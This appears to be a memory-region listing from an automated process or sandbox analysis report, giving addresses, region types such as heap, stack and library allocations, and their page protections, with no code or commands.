||
|
2BFF000
|
stack
|
page read and write
|
||
|
43BF000
|
trusted library allocation
|
page read and write
|
||
|
161A000
|
heap
|
page read and write
|
||
|
86CD000
|
trusted library allocation
|
page read and write
|
||
|
4412000
|
trusted library allocation
|
page read and write
|
||
|
43D7000
|
trusted library allocation
|
page read and write
|
||
|
3750000
|
heap
|
page read and write
|
||
|
77DE000
|
stack
|
page read and write
|
||
|
D49000
|
unkown
|
page execute and read and write
|
||
|
1607000
|
heap
|
page read and write
|
||
|
155C000
|
heap
|
page read and write
|
||
|
43C7000
|
trusted library allocation
|
page read and write
|
||
|
2BBE000
|
stack
|
page read and write
|
||
|
883A000
|
trusted library allocation
|
page read and write
|
||
|
4403000
|
trusted library allocation
|
page read and write
|
||
|
943000
|
trusted library allocation
|
page execute and read and write
|
||
|
23007F70000
|
heap
|
page read and write
|
||
|
43C6000
|
trusted library allocation
|
page read and write
|
||
|
160F000
|
heap
|
page read and write
|
||
|
43A7000
|
trusted library allocation
|
page read and write
|
||
|
156B000
|
heap
|
page read and write
|
||
|
891C000
|
heap
|
page read and write
|
||
|
291D000
|
stack
|
page read and write
|
||
|
43C7000
|
trusted library allocation
|
page read and write
|
||
|
1611000
|
heap
|
page read and write
|
||
|
43F4000
|
trusted library allocation
|
page read and write
|
||
|
43B7000
|
trusted library allocation
|
page read and write
|
||
|
6C9D000
|
stack
|
page read and write
|
||
|
26C0000
|
trusted library allocation
|
page read and write
|
||
|
3480000
|
trusted library section
|
page read and write
|
||
|
745B000
|
stack
|
page read and write
|
||
|
23007FD5000
|
heap
|
page read and write
|
||
|
15F4000
|
heap
|
page read and write
|
||
|
43E9000
|
trusted library allocation
|
page read and write
|
||
|
1603000
|
heap
|
page read and write
|
||
|
3919000
|
trusted library allocation
|
page read and write
|
||
|
43F7000
|
trusted library allocation
|
page read and write
|
||
|
43AF000
|
trusted library allocation
|
page read and write
|
||
|
6B5E000
|
stack
|
page read and write
|
||
|
9DC000
|
heap
|
page read and write
|
||
|
43D7000
|
trusted library allocation
|
page read and write
|
||
|
3380000
|
heap
|
page read and write
|
||
|
950000
|
heap
|
page read and write
|
||
|
C5B000
|
trusted library allocation
|
page execute and read and write
|
||
|
43B7000
|
trusted library allocation
|
page read and write
|
||
|
535E000
|
stack
|
page read and write
|
||
|
15F4000
|
heap
|
page read and write
|
||
|
2680000
|
heap
|
page read and write
|
||
|
21CE000
|
stack
|
page read and write
|
||
|
34D2000
|
trusted library allocation
|
page read and write
|
||
|
CE7000
|
heap
|
page read and write
|
||
|
43C7000
|
trusted library allocation
|
page read and write
|
||
|
43B9000
|
trusted library allocation
|
page read and write
|
||
|
1565000
|
heap
|
page read and write
|
||
|
1609000
|
heap
|
page read and write
|
||
|
303E000
|
stack
|
page read and write
|
||
|
8840000
|
trusted library allocation
|
page read and write
|
||
|
2F6D000
|
stack
|
page read and write
|
||
|
73681000
|
unkown
|
page execute read
|
||
|
3598000
|
trusted library allocation
|
page read and write
|
||
|
4598000
|
trusted library allocation
|
page read and write
|
||
|
BA0000
|
unkown
|
page readonly
|
||
|
8D40000
|
trusted library allocation
|
page execute and read and write
|
||
|
2180000
|
heap
|
page read and write
|
||
|
1520000
|
heap
|
page read and write
|
||
|
2744000
|
heap
|
page read and write
|
||
|
15F8000
|
heap
|
page read and write
|
||
|
156B000
|
heap
|
page read and write
|
||
|
8F8000
|
stack
|
page read and write
|
||
|
43B4000
|
trusted library allocation
|
page read and write
|
||
|
765B000
|
stack
|
page read and write
|
||
|
53A000
|
stack
|
page read and write
|
||
|
43AE000
|
trusted library allocation
|
page read and write
|
||
|
29A7000
|
trusted library allocation
|
page read and write
|
||
|
160F000
|
heap
|
page read and write
|
||
|
2B1E000
|
stack
|
page read and write
|
||
|
1585000
|
heap
|
page read and write
|
||
|
7369D000
|
unkown
|
page read and write
|
||
|
521E000
|
stack
|
page read and write
|
||
|
4427000
|
trusted library allocation
|
page read and write
|
||
|
43D5000
|
trusted library allocation
|
page read and write
|
||
|
D6E000
|
stack
|
page read and write
|
||
|
E0C000
|
stack
|
page read and write
|
||
|
5A0000
|
heap
|
page read and write
|
||
|
604E000
|
stack
|
page read and write
|
||
|
6DDE000
|
stack
|
page read and write
|
||
|
87DE000
|
stack
|
page read and write
|
||
|
275D000
|
stack
|
page read and write
|
||
|
15F2000
|
heap
|
page read and write
|
||
|
43D6000
|
trusted library allocation
|
page read and write
|
||
|
439F000
|
trusted library allocation
|
page read and write
|
||
|
4394000
|
trusted library allocation
|
page read and write
|
||
|
34C0000
|
trusted library allocation
|
page read and write
|
||
|
8914000
|
heap
|
page read and write
|
||
|
688C000
|
stack
|
page read and write
|
||
|
983000
|
heap
|
page read and write
|
||
|
7AA3000
|
heap
|
page read and write
|
||
|
1564000
|
heap
|
page read and write
|
||
|
4392000
|
trusted library allocation
|
page read and write
|
||
|
E82000
|
unkown
|
page execute and write copy
|
||
|
43E8000
|
trusted library allocation
|
page read and write
|
||
|
8908000
|
heap
|
page read and write
|
||
|
32F0000
|
heap
|
page read and write
|
||
|
7FF624730000
|
unkown
|
page readonly
|
||
|
8F3E000
|
stack
|
page read and write
|
||
|
43EE000
|
trusted library allocation
|
page read and write
|
||
|
86CB000
|
trusted library allocation
|
page read and write
|
||
|
5060000
|
heap
|
page read and write
|
||
|
2785000
|
heap
|
page read and write
|
||
|
3380000
|
direct allocation
|
page execute and read and write
|
||
|
3630000
|
trusted library allocation
|
page readonly
|
||
|
38F1000
|
trusted library allocation
|
page read and write
|
||
|
5DB5000
|
trusted library allocation
|
page read and write
|
||
|
43E5000
|
trusted library allocation
|
page read and write
|
||
|
7B3E000
|
stack
|
page read and write
|
||
|
43FC000
|
trusted library allocation
|
page read and write
|
||
|
4424000
|
trusted library allocation
|
page read and write
|
||
|
43A6000
|
trusted library allocation
|
page read and write
|
||
|
3080000
|
heap
|
page read and write
|
||
|
A06000
|
heap
|
page read and write
|
||
|
3470000
|
trusted library section
|
page read and write
|
||
|
26F0000
|
heap
|
page read and write
|
||
|
271D000
|
stack
|
page read and write
|
||
|
1607000
|
heap
|
page read and write
|
||
|
7B7E000
|
stack
|
page read and write
|
||
|
4401000
|
trusted library allocation
|
page read and write
|
||
|
43B7000
|
trusted library allocation
|
page read and write
|
||
|
BEE000
|
unkown
|
page execute and write copy
|
||
|
43B4000
|
trusted library allocation
|
page read and write
|
||
|
3426000
|
heap
|
page read and write
|
||
|
43E5000
|
trusted library allocation
|
page read and write
|
||
|
2C10000
|
heap
|
page read and write
|
||
|
94D000
|
trusted library allocation
|
page execute and read and write
|
||
|
34D5000
|
trusted library allocation
|
page execute and read and write
|
||
|
7CA0000
|
trusted library allocation
|
page read and write
|
||
|
5CCD000
|
stack
|
page read and write
|
||
|
759E000
|
stack
|
page read and write
|
||
|
4F4C000
|
stack
|
page read and write
|
||
|
152E000
|
heap
|
page read and write
|
||
|
43F7000
|
trusted library allocation
|
page read and write
|
||
|
761E000
|
stack
|
page read and write
|
||
|
28C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
D9D000
|
trusted library allocation
|
page read and write
|
||
|
43D9000
|
trusted library allocation
|
page read and write
|
||
|
43B9000
|
trusted library allocation
|
page read and write
|
||
|
35DE000
|
stack
|
page read and write
|
||
|
43C6000
|
trusted library allocation
|
page read and write
|
||
|
4395000
|
trusted library allocation
|
page read and write
|
||
|
BF1000
|
unkown
|
page execute and write copy
|
||
|
FFC2FFF000
|
stack
|
page read and write
|
||
|
4424000
|
trusted library allocation
|
page read and write
|
||
|
160F000
|
heap
|
page read and write
|
||
|
785F000
|
stack
|
page read and write
|
||
|
30B0000
|
direct allocation
|
page execute and read and write
|
||
|
75DB000
|
stack
|
page read and write
|
||
|
43D1000
|
trusted library allocation
|
page read and write
|
||
|
43A6000
|
trusted library allocation
|
page read and write
|
||
|
C42000
|
trusted library allocation
|
page read and write
|
||
|
29E4000
|
trusted library allocation
|
page read and write
|
||
|
D70000
|
trusted library allocation
|
page read and write
|
||
|
45CF000
|
trusted library allocation
|
page read and write
|
||
|
4491000
|
heap
|
page read and write
|
||
|
4491000
|
heap
|
page read and write
|
||
|
7A5D000
|
heap
|
page read and write
|
||
|
29C0000
|
trusted library allocation
|
page read and write
|
||
|
2A3E000
|
stack
|
page read and write
|
||
|
43AF000
|
trusted library allocation
|
page read and write
|
||
|
ED6000
|
heap
|
page read and write
|
||
|
2300803C000
|
heap
|
page read and write
|
||
|
FFC35FE000
|
stack
|
page read and write
|
||
|
1583000
|
heap
|
page read and write
|
||
|
2688000
|
heap
|
page read and write
|
||
|
698E000
|
stack
|
page read and write
|
||
|
15D3000
|
heap
|
page read and write
|
||
|
15F4000
|
heap
|
page read and write
|
||
|
6B1E000
|
stack
|
page read and write
|
||
|
43F0000
|
trusted library allocation
|
page read and write
|
||
|
34AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
43F4000
|
trusted library allocation
|
page read and write
|
||
|
43B7000
|
trusted library allocation
|
page read and write
|
||
|
1582000
|
heap
|
page read and write
|
||
|
4DE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
43B7000
|
trusted library allocation
|
page read and write
|
||
|
7A5B000
|
heap
|
page read and write
|
||
|
2EA0000
|
heap
|
page read and write
|
||
|
43A6000
|
trusted library allocation
|
page read and write
|
||
|
3180000
|
heap
|
page read and write
|
||
|
7369D000
|
unkown
|
page read and write
|
||
|
73696000
|
unkown
|
page readonly
|
||
|
940000
|
trusted library allocation
|
page read and write
|
||
|
4422000
|
trusted library allocation
|
page read and write
|
||
|
43B3000
|
trusted library allocation
|
page read and write
|
||
|
43BA000
|
trusted library allocation
|
page read and write
|
||
|
43DB000
|
trusted library allocation
|
page read and write
|
||
|
13F7000
|
heap
|
page read and write
|
||
|
15F8000
|
heap
|
page read and write
|
||
|
43FF000
|
trusted library allocation
|
page read and write
|
||
|
320F000
|
stack
|
page read and write
|
||
|
3490000
|
trusted library allocation
|
page read and write
|
||
|
538D000
|
stack
|
page read and write
|
||
|
466F000
|
trusted library allocation
|
page read and write
|
||
|
34CA000
|
trusted library allocation
|
page execute and read and write
|
||
|
2F10000
|
heap
|
page read and write
|
||
|
363F000
|
unkown
|
page read and write
|
||
|
7FA28000
|
trusted library allocation
|
page execute and read and write
|
||
|
43B7000
|
trusted library allocation
|
page read and write
|
||
|
353E000
|
stack
|
page read and write
|
||
|
23008001000
|
heap
|
page read and write
|
||
|
7FF624730000
|
unkown
|
page readonly
|
||
|
3040000
|
heap
|
page read and write
|
||
|
5E18000
|
trusted library allocation
|
page read and write
|
||
|
614E000
|
stack
|
page read and write
|
||
|
FFC36FC000
|
stack
|
page read and write
|
||
|
5B0000
|
heap
|
page read and write
|
||
|
43E9000
|
trusted library allocation
|
page read and write
|
||
|
7FF6246E0000
|
unkown
|
page readonly
|
||
|
43A6000
|
trusted library allocation
|
page read and write
|
||
|
15D5000
|
heap
|
page read and write
|
||
|
7FF62472C000
|
unkown
|
page read and write
|
||
|
23007FF4000
|
heap
|
page read and write
|
||
|
C3E000
|
stack
|
page read and write
|
||
|
5BCC000
|
stack
|
page read and write
|
||
|
43DE000
|
trusted library allocation
|
page read and write
|
||
|
4DDC000
|
stack
|
page read and write
|
||
|
541D000
|
stack
|
page read and write
|
||
|
86C0000
|
trusted library allocation
|
page read and write
|
||
|
29F1000
|
trusted library allocation
|
page read and write
|
||
|
7FF6246E1000
|
unkown
|
page execute read
|
||
|
8918000
|
heap
|
page read and write
|
||
|
684E000
|
stack
|
page read and write
|
||
|
43E6000
|
trusted library allocation
|
page read and write
|
||
|
32AE000
|
stack
|
page read and write
|
||
|
A1A000
|
heap
|
page read and write
|
||
|
8D13000
|
trusted library allocation
|
page read and write
|
||
|
15DA000
|
heap
|
page read and write
|
||
|
43CE000
|
trusted library allocation
|
page read and write
|
||
|
43E5000
|
trusted library allocation
|
page read and write
|
||
|
5B31000
|
trusted library allocation
|
page read and write
|
||
|
73680000
|
unkown
|
page readonly
|
||
|
D7B000
|
trusted library allocation
|
page read and write
|
||
|
160D000
|
heap
|
page read and write
|
||
|
65D3000
|
trusted library allocation
|
page read and write
|
||
|
6429000
|
trusted library allocation
|
page read and write
|
||
|
C52000
|
trusted library allocation
|
page read and write
|
||
|
89AE000
|
heap
|
page read and write
|
||
|
8790000
|
trusted library allocation
|
page execute and read and write
|
||
|
413F000
|
stack
|
page read and write
|
||
|
43B0000
|
trusted library allocation
|
page read and write
|
||
|
343E000
|
stack
|
page read and write
|
||
|
160F000
|
heap
|
page read and write
|
||
|
1580000
|
heap
|
page read and write
|
||
|
1564000
|
heap
|
page read and write
|
||
|
1611000
|
heap
|
page read and write
|
||
|
31BE000
|
stack
|
page read and write
|
||
|
2B20000
|
heap
|
page read and write
|
||
|
4A2000
|
unkown
|
page readonly
|
||
|
2756000
|
heap
|
page read and write
|
||
|
15FA000
|
heap
|
page read and write
|
||
|
15FA000
|
heap
|
page read and write
|
||
|
1544000
|
heap
|
page read and write
|
||
|
43DF000
|
trusted library allocation
|
page read and write
|
||
|
4F47000
|
heap
|
page read and write
|
||
|
4392000
|
trusted library allocation
|
page read and write
|
||
|
61E9000
|
heap
|
page read and write
|
||
|
30C3000
|
heap
|
page read and write
|
||
|
12FB000
|
stack
|
page read and write
|
||
|
20DD000
|
stack
|
page read and write
|
||
|
35B0000
|
heap
|
page read and write
|
||
|
160F000
|
heap
|
page read and write
|
||
|
43E7000
|
trusted library allocation
|
page read and write
|
||
|
15EE000
|
heap
|
page read and write
|
||
|
45CC000
|
stack
|
page read and write
|
||
|
2950000
|
trusted library allocation
|
page read and write
|
||
|
8EBE000
|
stack
|
page read and write
|
||
|
1606000
|
heap
|
page read and write
|
||
|
2796000
|
heap
|
page read and write
|
||
|
15D9000
|
heap
|
page read and write
|
||
|
43C7000
|
trusted library allocation
|
page read and write
|
||
|
250000
|
heap
|
page read and write
|
||
|
13F5000
|
heap
|
page read and write
|
||
|
43B4000
|
trusted library allocation
|
page read and write
|
||
|
2330000
|
heap
|
page read and write
|
||
|
33B8000
|
direct allocation
|
page execute and read and write
|
||
|
43E9000
|
trusted library allocation
|
page read and write
|
||
|
88EA000
|
heap
|
page read and write
|
||
|
1616000
|
heap
|
page read and write
|
||
|
45B7000
|
trusted library allocation
|
page read and write
|
||
|
1580000
|
heap
|
page read and write
|
||
|
674E000
|
stack
|
page read and write
|
||
|
305D000
|
stack
|
page read and write
|
||
|
2680000
|
trusted library allocation
|
page read and write
|
||
|
873D000
|
stack
|
page read and write
|
||
|
FFC2EFE000
|
stack
|
page read and write
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
3B3E000
|
stack
|
page read and write
|
||
|
2A7F000
|
stack
|
page read and write
|
||
|
24C0000
|
heap
|
page read and write
|
||
|
309D000
|
stack
|
page read and write
|
||
|
43C6000
|
trusted library allocation
|
page read and write
|
||
|
26A1000
|
heap
|
page read and write
|
||
|
3570000
|
heap
|
page read and write
|
||
|
7369D000
|
unkown
|
page read and write
|
||
|
43A6000
|
trusted library allocation
|
page read and write
|
||
|
88E0000
|
heap
|
page read and write
|
||
|
7FF62472C000
|
unkown
|
page write copy
|
||
|
2A0A000
|
trusted library allocation
|
page read and write
|
||
|
43A6000
|
trusted library allocation
|
page read and write
|
||
|
43A6000
|
trusted library allocation
|
page read and write
|
||
|
EC0000
|
heap
|
page read and write
|
||
|
2AA0000
|
heap
|
page read and write
|
||
|
34A0000
|
trusted library allocation
|
page read and write
|
||
|
5CD0000
|
heap
|
page read and write
|
||
|
28B2000
|
trusted library allocation
|
page read and write
|
||
|
670E000
|
stack
|
page read and write
|
||
|
158B000
|
heap
|
page read and write
|
||
|
3450000
|
heap
|
page read and write
|
||
|
7660000
|
heap
|
page read and write
|
||
|
4F0D000
|
stack
|
page read and write
|
||
|
2D7E000
|
stack
|
page read and write
|
||
|
6421000
|
trusted library allocation
|
page read and write
|
||
|
1606000
|
heap
|
page read and write
|
||
|
43C1000
|
trusted library allocation
|
page read and write
|
||
|
A5D000
|
trusted library allocation
|
page execute and read and write
|
||
|
26D000
|
stack
|
page read and write
|
||
|
43B7000
|
trusted library allocation
|
page read and write
|
||
|
13F0000
|
heap
|
page read and write
|
||
|
43D6000
|
trusted library allocation
|
page read and write
|
||
|
160F000
|
heap
|
page read and write
|
||
|
650E000
|
stack
|
page read and write
|
||
|
FF1E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
8AE2000
|
trusted library allocation
|
page read and write
|
||
|
310E000
|
stack
|
page read and write
|
||
|
61A2000
|
heap
|
page read and write
|
||
|
ED000
|
stack
|
page read and write
|
||
|
8E7B000
|
stack
|
page read and write
|
||
|
2F18000
|
heap
|
page read and write
|
||
|
29D4000
|
trusted library allocation
|
page read and write
|
||
|
4FA4000
|
trusted library allocation
|
page read and write
|
||
|
21D0000
|
heap
|
page read and write
|
||
|
95E000
|
heap
|
page read and write
|
||
|
43CF000
|
trusted library allocation
|
page read and write
|
||
|
600F000
|
stack
|
page read and write
|
||
|
61ED000
|
heap
|
page read and write
|
||
|
1580000
|
heap
|
page read and write
|
||
|
4407000
|
trusted library allocation
|
page read and write
|
||
|
1564000
|
heap
|
page read and write
|
||
|
43B7000
|
trusted library allocation
|
page read and write
|
||
|
7C10000
|
trusted library allocation
|
page read and write
|
||
|
43A7000
|
trusted library allocation
|
page read and write
|
||
|
7CB0000
|
trusted library allocation
|
page read and write
|
||
|
7FA10000
|
trusted library allocation
|
page execute and read and write
|
||
|
6487000
|
trusted library allocation
|
page read and write
|
||
|
294F000
|
unkown
|
page read and write
|
||
|
353E000
|
unkown
|
page read and write
|
||
|
D74000
|
trusted library allocation
|
page read and write
|
||
|
2775000
|
heap
|
page read and write
|
||
|
7AE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
15E4000
|
heap
|
page read and write
|
||
|
43AE000
|
trusted library allocation
|
page read and write
|
||
|
7A00000
|
heap
|
page read and write
|
||
|
28F1000
|
trusted library allocation
|
page read and write
|
||
|
50DE000
|
stack
|
page read and write
|
||
|
8904000
|
heap
|
page read and write
|
||
|
43B0000
|
trusted library allocation
|
page read and write
|
||
|
6E1E000
|
stack
|
page read and write
|
||
|
15EF000
|
heap
|
page read and write
|
||
|
2998000
|
trusted library allocation
|
page read and write
|
||
|
890C000
|
heap
|
page read and write
|
||
|
28B0000
|
trusted library allocation
|
page read and write
|
||
|
5ACE000
|
stack
|
page read and write
|
||
|
33BB000
|
direct allocation
|
page execute and read and write
|
||
|
43B7000
|
trusted library allocation
|
page read and write
|
||
|
5390000
|
heap
|
page execute and read and write
|
||
|
3632000
|
trusted library allocation
|
page readonly
|
||
|
89C8000
|
heap
|
page read and write
|
||
|
C70000
|
trusted library allocation
|
page read and write
|
||
|
30C8000
|
heap
|
page read and write
|
||
|
4395000
|
trusted library allocation
|
page read and write
|
||
|
976000
|
heap
|
page read and write
|
||
|
43B7000
|
trusted library allocation
|
page read and write
|
||
|
65B3000
|
trusted library allocation
|
page read and write
|
||
|
4ECF000
|
stack
|
page read and write
|
||
|
15DE000
|
heap
|
page read and write
|
||
|
4A96000
|
trusted library allocation
|
page read and write
|
||
|
43EA000
|
trusted library allocation
|
page read and write
|
||
|
1551000
|
heap
|
page read and write
|
||
|
44CB000
|
heap
|
page read and write
|
||
|
43B2000
|
trusted library allocation
|
page read and write
|
||
|
4590000
|
trusted library allocation
|
page read and write
|
||
|
43BA000
|
trusted library allocation
|
page read and write
|
||
|
8830000
|
trusted library allocation
|
page read and write
|
||
|
7BBE000
|
stack
|
page read and write
|
||
|
A60000
|
heap
|
page read and write
|
||
|
4667000
|
trusted library allocation
|
page read and write
|
||
|
4424000
|
trusted library allocation
|
page read and write
|
||
|
547B000
|
trusted library allocation
|
page read and write
|
||
|
49EE000
|
stack
|
page read and write
|
||
|
2C20000
|
heap
|
page read and write
|
||
|
86A0000
|
heap
|
page read and write
|
||
|
34A4000
|
trusted library allocation
|
page read and write
|
||
|
15F4000
|
heap
|
page read and write
|
||
|
43ED000
|
trusted library allocation
|
page read and write
|
||
|
58BB000
|
trusted library allocation
|
page read and write
|
||
|
7A45000
|
heap
|
page read and write
|
||
|
28A0000
|
heap
|
page read and write
|
||
|
2FD0000
|
direct allocation
|
page execute and read and write
|
||
|
749E000
|
stack
|
page read and write
|
||
|
1350000
|
heap
|
page read and write
|
||
|
3100000
|
heap
|
page read and write
|
||
|
73681000
|
unkown
|
page execute read
|
||
|
7FF6246E1000
|
unkown
|
page execute read
|
||
|
86D0000
|
trusted library allocation
|
page read and write
|
||
|
2FC0000
|
heap
|
page read and write
|
||
|
A66000
|
heap
|
page read and write
|
||
|
5400000
|
trusted library allocation
|
page read and write
|
||
|
43CA000
|
trusted library allocation
|
page read and write
|
||
|
8910000
|
heap
|
page read and write
|
||
|
69CE000
|
stack
|
page read and write
|
||
|
1609000
|
heap
|
page read and write
|
||
|
43A1000
|
trusted library allocation
|
page read and write
|
||
|
7C80000
|
trusted library allocation
|
page read and write
|
||
|
7BFD000
|
stack
|
page read and write
|
||
|
2720000
|
heap
|
page read and write
|
||
|
4D9C000
|
stack
|
page read and write
|
||
|
2A12000
|
trusted library allocation
|
page read and write
|
||
|
2380000
|
heap
|
page read and write
|
||
|
43F7000
|
trusted library allocation
|
page read and write
|
||
|
43D2000
|
trusted library allocation
|
page read and write
|
||
|
321E000
|
stack
|
page read and write
|
||
|
8B9E000
|
stack
|
page read and write
|
||
|
15E4000
|
heap
|
page read and write
|
||
|
6CDC000
|
stack
|
page read and write
|
||
|
32FD000
|
stack
|
page read and write
|
||
|
1607000
|
heap
|
page read and write
|
||
|
539E000
|
stack
|
page read and write
|
||
|
43AE000
|
trusted library allocation
|
page read and write
|
||
|
29D0000
|
heap
|
page read and write
|
||
|
43C7000
|
trusted library allocation
|
page read and write
|
||
|
5090000
|
heap
|
page execute and read and write
|
||
|
DC7000
|
heap
|
page read and write
|
||
|
28E0000
|
heap
|
page execute and read and write
|
||
|
32F0000
|
heap
|
page read and write
|
||
|
D91000
|
trusted library allocation
|
page read and write
|
||
|
2743000
|
heap
|
page read and write
|
||
|
2B40000
|
heap
|
page read and write
|
||
|
8D30000
|
trusted library allocation
|
page read and write
|
||
|
28DD000
|
stack
|
page read and write
|
||
|
D96000
|
trusted library allocation
|
page read and write
|
||
|
2766000
|
heap
|
page read and write
|
||
|
43D3000
|
trusted library allocation
|
page read and write
|
||
|
7C90000
|
trusted library allocation
|
page read and write
|
||
|
161C000
|
heap
|
page read and write
|
||
|
7C60000
|
trusted library allocation
|
page read and write
|
||
|
2ACE000
|
trusted library allocation
|
page read and write
|
||
|
C03000
|
unkown
|
page execute and write copy
|
||
|
43C1000
|
trusted library allocation
|
page read and write
|
||
|
15F2000
|
heap
|
page read and write
|
||
|
1607000
|
heap
|
page read and write
|
||
|
6B9C000
|
stack
|
page read and write
|
||
|
26A3000
|
heap
|
page read and write
|
||
|
33C4000
|
direct allocation
|
page execute and read and write
|
||
|
23007FE0000
|
heap
|
page read and write
|
||
|
DA2000
|
trusted library allocation
|
page read and write
|
||
|
160F000
|
heap
|
page read and write
|
||
|
C46000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DE0000
|
heap
|
page read and write
|
||
|
23007FE9000
|
heap
|
page read and write
|
||
|
8EFD000
|
stack
|
page read and write
|
||
|
2786000
|
heap
|
page read and write
|
||
|
51DE000
|
stack
|
page read and write
|
||
|
FFC33FE000
|
stack
|
page read and write
|
||
|
30A0000
|
heap
|
page read and write
|
||
|
43DF000
|
trusted library allocation
|
page read and write
|
||
|
152A000
|
heap
|
page read and write
|
||
|
23008045000
|
heap
|
page read and write
|
||
|
43E3000
|
trusted library allocation
|
page read and write
|
||
|
1565000
|
heap
|
page read and write
|
||
|
31FD000
|
stack
|
page read and write
|
||
|
7A6F000
|
heap
|
page read and write
|
||
|
79E9000
|
heap
|
page read and write
|
||
|
33C0000
|
direct allocation
|
page execute and read and write
|
||
|
2765000
|
heap
|
page read and write
|
||
|
78E2000
|
heap
|
page read and write
|
||
|
43AE000
|
trusted library allocation
|
page read and write
|
||
|
4E50000
|
heap
|
page read and write
|
||
|
4398000
|
trusted library allocation
|
page read and write
|
||
|
43AE000
|
trusted library allocation
|
page read and write
|
||
|
881E000
|
stack
|
page read and write
|
||
|
6ACD000
|
stack
|
page read and write
|
||
|
668F000
|
stack
|
page read and write
|
||
|
3388000
|
heap
|
page read and write
|
||
|
DB0000
|
trusted library allocation
|
page read and write
|
||
|
4A0000
|
unkown
|
page readonly
|
||
|
43FF000
|
trusted library allocation
|
page read and write
|
||
|
7C50000
|
trusted library allocation
|
page read and write
|
||
|
15F8000
|
heap
|
page read and write
|
||
|
2630000
|
heap
|
page read and write
|
||
|
89A2000
|
heap
|
page read and write
|
||
|
43BC000
|
trusted library allocation
|
page read and write
|
||
|
4E60000
|
heap
|
page read and write
|
||
|
29CE000
|
trusted library allocation
|
page read and write
|
||
|
43DD000
|
trusted library allocation
|
page read and write
|
||
|
156B000
|
heap
|
page read and write
|
||
|
4420000
|
trusted library allocation
|
page read and write
|
||
|
4391000
|
trusted library allocation
|
page read and write
|
||
|
FFC32FE000
|
stack
|
page read and write
|
||
|
3280000
|
heap
|
page read and write
|
||
|
24BF000
|
stack
|
page read and write
|
||
|
1580000
|
heap
|
page read and write
|
||
|
7A35000
|
heap
|
page read and write
|
||
|
43B7000
|
trusted library allocation
|
page read and write
|
||
|
156B000
|
heap
|
page read and write
|
||
|
2DF0000
|
heap
|
page read and write
|
||
|
23007E90000
|
heap
|
page read and write
|
||
|
160F000
|
heap
|
page read and write
|
||
|
8D8D000
|
stack
|
page read and write
|
||
|
4397000
|
trusted library allocation
|
page read and write
|
||
|
357E000
|
stack
|
page read and write
|
||
|
43C1000
|
trusted library allocation
|
page read and write
|
||
|
1609000
|
heap
|
page read and write
|
||
|
43E7000
|
trusted library allocation
|
page read and write
|
||
|
2D3D000
|
stack
|
page read and write
|
||
|
7C40000
|
trusted library allocation
|
page read and write
|
||
|
4E63000
|
heap
|
page read and write
|
||
|
3400000
|
heap
|
page read and write
|
||
|
4677000
|
trusted library allocation
|
page read and write
|
||
|
4DF0000
|
trusted library allocation
|
page read and write
|
||
|
15E0000
|
heap
|
page read and write
|
||
|
1588000
|
heap
|
page read and write
|
||
|
1611000
|
heap
|
page read and write
|
||
|
34F0000
|
trusted library allocation
|
page read and write
|
||
|
43B7000
|
trusted library allocation
|
page read and write
|
||
|
3422000
|
heap
|
page read and write
|
||
|
4395000
|
trusted library allocation
|
page read and write
|
||
|
33B4000
|
direct allocation
|
page execute and read and write
|
||
|
291F000
|
unkown
|
page read and write
|
||
|
8942000
|
heap
|
page read and write
|
||
|
2FF0000
|
heap
|
page read and write
|
||
|
A53000
|
trusted library allocation
|
page read and write
|
||
|
2755000
|
heap
|
page read and write
|
||
|
664D000
|
stack
|
page read and write
|
||
|
65CA000
|
trusted library allocation
|
page read and write
|
||
|
1614000
|
heap
|
page read and write
|
||
|
43E7000
|
trusted library allocation
|
page read and write
|
||
|
751E000
|
stack
|
page read and write
|
||
|
504C000
|
stack
|
page read and write
|
||
|
161A000
|
heap
|
page read and write
|
||
|
3C41000
|
trusted library allocation
|
page read and write
|
||
|
FFB000
|
stack
|
page read and write
|
||
|
160A000
|
heap
|
page read and write
|
||
|
1611000
|
heap
|
page read and write
|
||
|
43F4000
|
trusted library allocation
|
page read and write
|
||
|
5410000
|
heap
|
page execute and read and write
|
||
|
3573000
|
heap
|
page read and write
|
||
|
4397000
|
trusted library allocation
|
page read and write
|
||
|
7369F000
|
unkown
|
page readonly
|
||
|
463F000
|
trusted library allocation
|
page read and write
|
||
|
482E000
|
stack
|
page read and write
|
||
|
43DD000
|
trusted library allocation
|
page read and write
|
||
|
73696000
|
unkown
|
page readonly
|
||
|
15D6000
|
heap
|
page read and write
|
||
|
BA1000
|
unkown
|
page execute and read and write
|
||
|
43B7000
|
trusted library allocation
|
page read and write
|
||
|
8993000
|
heap
|
page read and write
|
||
|
43E8000
|
trusted library allocation
|
page read and write
|
||
|
43B7000
|
trusted library allocation
|
page read and write
|
||
|
DC0000
|
heap
|
page read and write
|
||
|
7FF624717000
|
unkown
|
page readonly
|
||
|
7A51000
|
heap
|
page read and write
|
||
|
1609000
|
heap
|
page read and write
|
||
|
1609000
|
heap
|
page read and write
|
||
|
29E000
|
unkown
|
page read and write
|
||
|
367E000
|
stack
|
page read and write
|
||
|
5576000
|
trusted library allocation
|
page read and write
|
||
|
15F4000
|
heap
|
page read and write
|
||
|
530E000
|
stack
|
page read and write
|
||
|
5FE000
|
stack
|
page read and write
|
||
|
43D3000
|
trusted library allocation
|
page read and write
|
||
|
43C5000
|
trusted library allocation
|
page read and write
|